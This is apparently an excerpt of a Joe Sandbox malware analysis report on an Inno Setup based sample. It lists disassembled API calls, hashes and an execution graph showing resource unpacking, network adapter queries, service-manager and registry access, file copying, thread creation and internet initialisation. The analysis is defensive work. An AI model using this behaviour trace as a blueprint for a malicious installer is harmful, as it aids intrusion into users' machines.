                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateErrorHandleLastProcess
                                                                                                    • String ID: 0nI
                                                                                                    • API String ID: 3798668922-794067871
                                                                                                    • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                    • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                                    • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                    • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$EnumQuery
                                                                                                    • String ID: Inno Setup: No Icons
                                                                                                    • API String ID: 1576479698-2016326496
                                                                                                    • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                    • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                                    • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                    • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                                    APIs
                                                                                                    • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesErrorFileLast
                                                                                                    • String ID: T$H
                                                                                                    • API String ID: 1799206407-488339322
                                                                                                    • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                                    • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                                    • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                                    • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                                    APIs
                                                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DeleteErrorFileLast
                                                                                                    • String ID: T$H
                                                                                                    • API String ID: 2018770650-488339322
                                                                                                    • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                                    • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                                    • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                                    • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                                    APIs
                                                                                                    • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryErrorLastRemove
                                                                                                    • String ID: T$H
                                                                                                    • API String ID: 377330604-488339322
                                                                                                    • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                                    • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                                    • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                                    • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                                    APIs
                                                                                                      • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(6EA10000,00481A2F), ref: 0047D0E2
                                                                                                      • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                                      • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                                    • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                                    • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                                    Strings
                                                                                                    • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                    • String ID: Detected restart. Removing temporary directory.
                                                                                                    • API String ID: 1717587489-3199836293
                                                                                                    • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                                    • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                                    • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                                    • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 1458359878-0
                                                                                                    • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                                    • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                                    • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                                    • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:2.5%
                                                                                                    Dynamic/Decrypted Code Coverage:70.2%
                                                                                                    Signature Coverage:17.9%
                                                                                                    Total number of Nodes:463
                                                                                                    Total number of Limit Nodes:22
                                                                                                    execution_graph 61038 40d242 61041 401301 FindResourceA 61038->61041 61040 40d247 61042 401367 SizeofResource 61041->61042 61047 401360 61041->61047 61043 401386 LoadResource LockResource GlobalAlloc 61042->61043 61042->61047 61044 4013cc 61043->61044 61045 40141f GetTickCount 61044->61045 61048 40142a GlobalAlloc 61045->61048 61047->61040 61048->61047 61241 40d422 OpenSCManagerA 61242 40219e 61241->61242 61242->61242 61049 402048 CopyFileA 61050 2d4e99c LoadLibraryA 61051 2d4e9c5 GetProcAddress 61050->61051 61052 2d4ea7f 61050->61052 61053 2d4ea78 FreeLibrary 61051->61053 61056 2d4e9d9 61051->61056 61053->61052 61054 2d4e9eb GetAdaptersInfo 61054->61056 61055 2d4ea73 61055->61053 61056->61054 61056->61055 61058 2d527b5 61056->61058 61062 2d527bd 61058->61062 61060 2d527d7 61060->61056 61062->61060 61063 2d527db std::exception::exception 61062->61063 61066 2d51fac 61062->61066 61083 2d56e63 RtlDecodePointer 61062->61083 61084 2d531ba RaiseException 61063->61084 61065 2d52805 61067 2d52027 61066->61067 61075 2d51fb8 61066->61075 61091 2d56e63 RtlDecodePointer 61067->61091 61069 2d5202d 61092 2d54abb 59 API calls __getptd_noexit 61069->61092 61072 2d51feb RtlAllocateHeap 61073 2d5201f 61072->61073 61072->61075 61073->61062 61075->61072 61076 2d52013 61075->61076 61077 2d51fc3 61075->61077 61081 2d52011 61075->61081 61088 2d56e63 RtlDecodePointer 61075->61088 61089 2d54abb 59 API calls __getptd_noexit 61076->61089 61077->61075 61085 2d57281 59 API calls __NMSG_WRITE 61077->61085 61086 2d572de 59 API calls 7 library calls 61077->61086 61087 2d56eca GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 61077->61087 61090 2d54abb 59 API calls __getptd_noexit 61081->61090 61083->61062 61084->61065 61085->61077 61086->61077 61088->61075 61089->61081 61090->61073 61091->61069 61092->61073 61245 4019a8 61246 4019af RegOpenKeyExA 61245->61246 61248 40193a 61245->61248 61093 2d7d75c 61096 2d7d773 61093->61096 61094 2d7d7f0 CreateFileA 61095 2d7d817 61094->61095 61096->61094 61096->61095 61097 2d4e898 CreateFileA 61098 2d4e994 61097->61098 61103 2d4e8c9 61097->61103 61099 2d4e8e1 DeviceIoControl 61099->61103 61100 2d4e98a CloseHandle 61100->61098 61101 2d4e956 GetLastError 61101->61100 61101->61103 61102 2d527b5 _Allocate 60 API calls 61102->61103 61103->61099 61103->61100 61103->61101 61103->61102 61249 401f2c 61250 40d057 RegQueryValueExA 61249->61250 61251 40d065 61250->61251 61252 401e1f 61250->61252 61252->61249 61253 40d02c RegSetValueExA RegCloseKey 61104 401e4d 61105 40dc92 CreateDirectoryA 61104->61105 61106 40df21 61105->61106 61254 2d52978 61255 2d52986 61254->61255 61256 2d52981 61254->61256 61260 2d5299b 61255->61260 61268 2d5917c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 61256->61268 61259 2d52994 61261 2d529a7 __read 61260->61261 61263 2d52a52 __read 61261->61263 61265 2d529f5 ___DllMainCRTStartup 61261->61265 61269 2d52806 61261->61269 61263->61259 61264 2d52806 __CRT_INIT@12 138 API calls 61264->61263 61265->61263 61266 2d52806 __CRT_INIT@12 138 API calls 61265->61266 61267 2d52a2f 61265->61267 61266->61267 61267->61263 61267->61264 61268->61255 61270 2d52812 __read 61269->61270 61271 2d52894 61270->61271 61272 2d5281a 61270->61272 61274 2d528fd 61271->61274 61275 2d52898 61271->61275 61317 2d56e46 GetProcessHeap 61272->61317 61277 2d52960 61274->61277 61278 2d52902 61274->61278 61280 2d528b9 61275->61280 61310 2d52823 __CRT_INIT@12 __read 61275->61310 61406 2d57009 59 API calls _doexit 61275->61406 61276 2d5281f 61276->61310 61318 2d549f4 61276->61318 61277->61310 61437 2d54884 59 API calls 2 library calls 61277->61437 61411 2d57d7b 61278->61411 61407 2d56ee0 61 API calls _free 61280->61407 61283 2d5290d 61283->61310 61414 2d5761a 61283->61414 61286 2d528be 61288 2d528cf __CRT_INIT@12 61286->61288 61408 2d58e1a 60 API calls _free 61286->61408 61287 2d5282f __RTC_Initialize 61294 2d5283f GetCommandLineA 61287->61294 61287->61310 61410 2d528e8 62 API calls __mtterm 61288->61410 61293 2d528ca 61409 2d54a6a 62 API calls 2 library calls 61293->61409 61339 2d59218 GetEnvironmentStringsW 61294->61339 61298 2d52936 61300 2d52954 61298->61300 61301 2d5293c 61298->61301 61431 2d51f74 61300->61431 61421 2d54941 61301->61421 61305 2d52859 61307 2d5285d 61305->61307 61371 2d58e6c 61305->61371 61306 2d52944 GetCurrentThreadId 61306->61310 61404 2d54a6a 62 API calls 2 library calls 61307->61404 61310->61265 61312 2d5287d 61312->61310 61405 2d58e1a 60 API calls _free 61312->61405 61317->61276 61438 2d570b0 36 API calls 2 library calls 61318->61438 61320 2d549f9 61439 2d575cc InitializeCriticalSectionAndSpinCount __ioinit 61320->61439 61322 2d549fe 61323 2d54a02 61322->61323 61441 2d57d3e TlsAlloc 61322->61441 61440 2d54a6a 62 API calls 2 library calls 61323->61440 61326 2d54a14 61326->61323 61328 2d54a1f 61326->61328 61327 2d54a07 61327->61287 61329 2d5761a __calloc_crt 59 API calls 61328->61329 61330 2d54a2c 61329->61330 61331 2d54a61 61330->61331 61442 2d57d9a TlsSetValue 61330->61442 61443 2d54a6a 62 API calls 2 library calls 61331->61443 61334 2d54a40 61334->61331 61336 2d54a46 61334->61336 61335 2d54a66 61335->61287 61337 2d54941 __initptd 59 API calls 61336->61337 61338 2d54a4e GetCurrentThreadId 61337->61338 61338->61287 61341 2d5922b WideCharToMultiByte 61339->61341 61345 2d5284f 61339->61345 61342 2d59295 FreeEnvironmentStringsW 61341->61342 61343 2d5925e 61341->61343 61342->61345 61444 2d57662 59 API calls 2 library calls 61343->61444 61352 2d58b66 61345->61352 61346 2d59264 61346->61342 61347 2d5926b WideCharToMultiByte 61346->61347 61348 2d59281 61347->61348 61349 2d5928a FreeEnvironmentStringsW 61347->61349 61350 2d51f74 _free 59 API calls 61348->61350 61349->61345 61351 2d59287 61350->61351 61351->61349 61353 2d58b72 __read 61352->61353 61354 2d5749b __lock 59 API calls 61353->61354 61355 2d58b79 61354->61355 61356 2d5761a __calloc_crt 59 API calls 61355->61356 61359 2d58b8a 61356->61359 61357 2d58b95 @_EH4_CallFilterFunc@8 __read 61357->61305 61358 2d58bf5 GetStartupInfoW 61364 2d58c0a 61358->61364 61368 2d58d39 61358->61368 61359->61357 61359->61358 61360 2d58e01 61447 2d58e11 RtlLeaveCriticalSection _doexit 61360->61447 61362 2d5761a __calloc_crt 59 API calls 61362->61364 61363 2d58d86 GetStdHandle 61363->61368 61364->61362 61367 2d58c58 61364->61367 61364->61368 61365 2d58d99 GetFileType 61365->61368 61366 2d58c8c GetFileType 61366->61367 61367->61366 61367->61368 61445 2d57dbc InitializeCriticalSectionAndSpinCount 61367->61445 61368->61360 61368->61363 61368->61365 61446 2d57dbc InitializeCriticalSectionAndSpinCount 61368->61446 61372 2d58e7f GetModuleFileNameA 61371->61372 61373 2d58e7a 61371->61373 61375 2d58eac 61372->61375 61454 2d53eea 71 API calls __setmbcp 61373->61454 61448 2d58f1f 61375->61448 61379 2d58ee5 61380 2d58f1f _parse_cmdline 59 API calls 61379->61380 61381 2d52869 61379->61381 61380->61381 61381->61312 61382 2d5909b 61381->61382 61383 2d590a4 61382->61383 61385 2d590a9 _strlen 61382->61385 61458 2d53eea 71 API calls __setmbcp 61383->61458 61386 2d5761a __calloc_crt 59 API calls 61385->61386 61389 2d52872 61385->61389 61394 2d590df _strlen 61386->61394 61387 2d59131 61388 2d51f74 _free 59 API calls 61387->61388 61388->61389 61389->61312 61398 2d57018 61389->61398 61390 2d5761a __calloc_crt 59 API calls 61390->61394 61391 2d59158 61392 2d51f74 _free 59 API calls 61391->61392 61392->61389 61394->61387 61394->61389 61394->61390 61394->61391 61395 2d5916f 61394->61395 61459 2d5591c 59 API calls __read 61394->61459 61460 2d53b65 8 API calls 2 library calls 61395->61460 61397 2d5917b 61400 2d57024 __IsNonwritableInCurrentImage 61398->61400 61461 2d5ab7f 61400->61461 61401 2d57042 __initterm_e 61402 2d523a4 __cinit 68 API calls 61401->61402 61403 2d57061 _doexit __IsNonwritableInCurrentImage 61401->61403 61402->61403 61403->61312 61404->61310 61405->61307 61406->61280 61407->61286 61408->61293 61409->61288 61410->61310 61412 2d57d92 TlsGetValue 61411->61412 61413 2d57d8e 61411->61413 61412->61283 61413->61283 61416 2d57621 61414->61416 61417 2d5291e 61416->61417 61419 2d5763f 61416->61419 61464 2d5e9a8 61416->61464 61417->61310 61420 2d57d9a TlsSetValue 61417->61420 61419->61416 61419->61417 61472 2d580b7 Sleep 61419->61472 61420->61298 61422 2d5494d __read 61421->61422 61423 2d5749b __lock 59 API calls 61422->61423 61424 2d5498a 61423->61424 61475 2d549e2 61424->61475 61427 2d5749b __lock 59 API calls 61428 2d549ab ___addlocaleref 61427->61428 61478 2d549eb 61428->61478 61430 2d549d6 __read 61430->61306 61432 2d51f7d HeapFree 61431->61432 61433 2d51fa6 _free 61431->61433 61432->61433 61434 2d51f92 61432->61434 61433->61310 61483 2d54abb 59 API calls __getptd_noexit 61434->61483 61436 2d51f98 GetLastError 61436->61433 61437->61310 61438->61320 61439->61322 61440->61327 61441->61326 61442->61334 61443->61335 61444->61346 61445->61367 61446->61368 61447->61357 61450 2d58f41 61448->61450 61453 2d58fa5 61450->61453 61456 2d5ef86 59 API calls x_ismbbtype_l 61450->61456 61451 2d58ec2 61451->61381 61455 2d57662 59 API calls 2 library calls 61451->61455 61453->61451 61457 2d5ef86 59 API calls x_ismbbtype_l 61453->61457 61454->61372 61455->61379 61456->61450 61457->61453 61458->61385 61459->61394 61460->61397 61462 2d5ab82 RtlEncodePointer 61461->61462 61462->61462 61463 2d5ab9c 61462->61463 61463->61401 61465 2d5e9b3 61464->61465 61470 2d5e9ce 61464->61470 61466 2d5e9bf 61465->61466 61465->61470 61473 2d54abb 59 API calls __getptd_noexit 61466->61473 61468 2d5e9de RtlAllocateHeap 61469 2d5e9c4 61468->61469 61468->61470 61469->61416 61470->61468 61470->61469 61474 2d56e63 RtlDecodePointer 61470->61474 61472->61419 61473->61469 61474->61470 61481 2d57605 RtlLeaveCriticalSection 61475->61481 61477 2d549a4 61477->61427 61482 2d57605 RtlLeaveCriticalSection 61478->61482 61480 2d549f2 61480->61430 61481->61477 61482->61480 61483->61436 61484 402970 GetVersion 61508 403ab4 HeapCreate 61484->61508 61486 4029cf 61487 4029d4 61486->61487 61488 4029dc 61486->61488 61583 402a8b 8 API calls 61487->61583 61520 403794 61488->61520 61491 4029e4 GetCommandLineA 61534 403662 61491->61534 61496 4029fe 61566 40335c 61496->61566 61498 402a03 61499 402a08 GetStartupInfoA 61498->61499 61579 403304 61499->61579 61501 402a1a GetModuleHandleA 61503 402a3e 61501->61503 61584 4030ab GetCurrentProcess TerminateProcess ExitProcess 61503->61584 61505 402a47 61585 403180 UnhandledExceptionFilter 61505->61585 61507 402a58 61509 403ad4 61508->61509 61510 403b0a 61508->61510 61586 40396c 19 API calls 61509->61586 61510->61486 61512 403ad9 61513 403af0 61512->61513 61514 403ae3 61512->61514 61515 403b0d 61513->61515 61588 4046dc HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 61513->61588 61587 403e8b HeapAlloc 61514->61587 61515->61486 61518 403aed 61518->61515 61519 403afe HeapDestroy 61518->61519 61519->61510 61589 402aaf 61520->61589 61523 4037b3 GetStartupInfoA 61526 4038c4 61523->61526 61527 4037ff 61523->61527 61528 4038eb GetStdHandle 61526->61528 61529 40392b SetHandleCount 61526->61529 61527->61526 61531 402aaf 12 API calls 61527->61531 61533 403870 61527->61533 61528->61526 61530 4038f9 GetFileType 61528->61530 61529->61491 61530->61526 61531->61527 61532 403892 GetFileType 61532->61533 61533->61526 61533->61532 61535 4036b0 61534->61535 61536 40367d GetEnvironmentStringsW 61534->61536 61538 403685 61535->61538 61539 4036a1 61535->61539 61537 403691 GetEnvironmentStrings 61536->61537 61536->61538 61537->61539 61540 4029f4 61537->61540 61541 4036c9 WideCharToMultiByte 61538->61541 61542 4036bd GetEnvironmentStringsW 61538->61542 61539->61540 61543 403743 GetEnvironmentStrings 61539->61543 61544 40374f 61539->61544 61557 403415 61540->61557 61546 4036fd 61541->61546 61547 40372f FreeEnvironmentStringsW 61541->61547 61542->61540 61542->61541 61543->61540 61543->61544 61548 402aaf 12 API calls 61544->61548 61549 402aaf 12 API calls 61546->61549 61547->61540 61551 40376a 61548->61551 61550 403703 61549->61550 61550->61547 61552 40370c WideCharToMultiByte 61550->61552 61553 403780 FreeEnvironmentStringsA 61551->61553 61554 403726 61552->61554 61555 40371d 61552->61555 61553->61540 61554->61547 61598 402b61 61555->61598 61558 403427 61557->61558 61559 40342c GetModuleFileNameA 61557->61559 61611 405c74 19 API calls 61558->61611 61561 40344f 61559->61561 61562 402aaf 12 API calls 61561->61562 61564 403470 61562->61564 61563 403480 61563->61496 61564->61563 61612 402a66 7 API calls 61564->61612 61567 403369 61566->61567 61569 40336e 61566->61569 61613 405c74 19 API calls 61567->61613 61570 402aaf 12 API calls 61569->61570 61571 40339b 61570->61571 61578 4033af 61571->61578 61614 402a66 7 API calls 61571->61614 61572 4033f2 61574 402b61 7 API calls 61572->61574 61575 4033fe 61574->61575 61575->61498 61576 402aaf 12 API calls 61576->61578 61578->61572 61578->61576 61615 402a66 7 API calls 61578->61615 61580 40330d 61579->61580 61582 403312 61579->61582 61616 405c74 19 API calls 61580->61616 61582->61501 61584->61505 61585->61507 61586->61512 61587->61518 61588->61518 61593 402ac1 61589->61593 61592 402a66 7 API calls 61592->61523 61594 402abe 61593->61594 61596 402ac8 61593->61596 61594->61523 61594->61592 61596->61594 61597 402aed 12 API calls 61596->61597 61597->61596 61599 402b6d 61598->61599 61607 402b89 61598->61607 61600 402b77 61599->61600 61604 402b8d 61599->61604 61602 402bb9 HeapFree 61600->61602 61603 402b83 61600->61603 61601 402bb8 61601->61602 61602->61607 61609 403efe VirtualFree VirtualFree HeapFree 61603->61609 61604->61601 61606 402ba7 61604->61606 61610 40498f VirtualFree HeapFree VirtualFree 61606->61610 61607->61554 61609->61607 61610->61607 61611->61559 61612->61563 61613->61569 61614->61578 61615->61578 61616->61582 61617 402230 61618 40d06c LoadLibraryExA 61617->61618 61619 40d08c 61618->61619 61620 4018b3 lstrcmpiW 61621 4018c1 61620->61621 61622 40ddd6 lstrcmpiW 61621->61622 61107 2d7c903 61108 2dc352a WriteFile 61107->61108 61109 2dde88b 61108->61109 61623 402034 Sleep 61624 40d849 61623->61624 61110 2d7d30f 61111 2ddea14 SHGetSpecialFolderPathA 61110->61111 61112 2d4104d 61117 2d523a4 61112->61117 61123 2d522a8 61117->61123 61119 2d41057 61120 2d41aa9 InterlockedIncrement 61119->61120 61121 2d41ac5 WSAStartup InterlockedExchange 61120->61121 61122 2d4105c 61120->61122 61121->61122 61124 2d522b4 __read 61123->61124 61131 2d57140 61124->61131 61130 2d522db __read 61130->61119 61148 2d5749b 61131->61148 61133 2d522bd 61134 2d522ec RtlDecodePointer RtlDecodePointer 61133->61134 61135 2d52319 61134->61135 61136 2d522c9 61134->61136 61135->61136 61157 2d57d0d 60 API calls __read 61135->61157 61145 2d522e6 61136->61145 61138 2d5237c RtlEncodePointer RtlEncodePointer 61138->61136 61139 2d52350 61139->61136 61144 2d5236a RtlEncodePointer 61139->61144 61159 2d576a9 62 API calls 2 library calls 61139->61159 61140 2d5232b 61140->61138 61140->61139 61158 2d576a9 62 API calls 2 library calls 61140->61158 61143 2d52364 61143->61136 61143->61144 61144->61138 61160 2d57149 61145->61160 61149 2d574ac 61148->61149 61150 2d574bf RtlEnterCriticalSection 61148->61150 61155 2d57523 59 API calls 9 library calls 61149->61155 61150->61133 61152 2d574b2 61152->61150 61156 2d56fed 59 API calls 3 library calls 61152->61156 61155->61152 61157->61140 61158->61139 61159->61143 61163 2d57605 RtlLeaveCriticalSection 61160->61163 61162 2d522eb 61162->61130 61163->61162 61625 2d7d5ae 61626 2d83f24 InternetOpenA 61625->61626 61164 40235b 61165 40dbdb CopyFileA 61164->61165 61166 40dbe2 61165->61166 61166->61166 61167 2d7c44a 61168 2da0fc4 CreateThread 61167->61168 61169 2d45e4f RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 61168->61169 61239 2d442c7 61169->61239 61171 2d45ebc GetTickCount 61172 2d459fa 59 API calls 61171->61172 61173 2d45ed9 GetVersionExA 61172->61173 61174 2d45f1a _memset 61173->61174 61175 2d51fac _malloc 59 API calls 61174->61175 61176 2d45f27 61175->61176 61177 2d51fac _malloc 59 API calls 61176->61177 61178 2d45f37 61177->61178 61179 2d51fac _malloc 59 API calls 61178->61179 61180 2d45f42 61179->61180 61181 2d51fac _malloc 59 API calls 61180->61181 61182 2d45f4d 61181->61182 61183 2d51fac _malloc 59 API calls 61182->61183 61184 2d45f58 61183->61184 61185 2d51fac _malloc 59 API calls 61184->61185 61186 2d45f63 61185->61186 61187 2d51fac _malloc 59 API calls 61186->61187 61188 2d45f6e 61187->61188 61189 2d51fac _malloc 59 API calls 61188->61189 61190 2d45f7a 6 API calls 61189->61190 61191 2d45fc7 _memset 61190->61191 61192 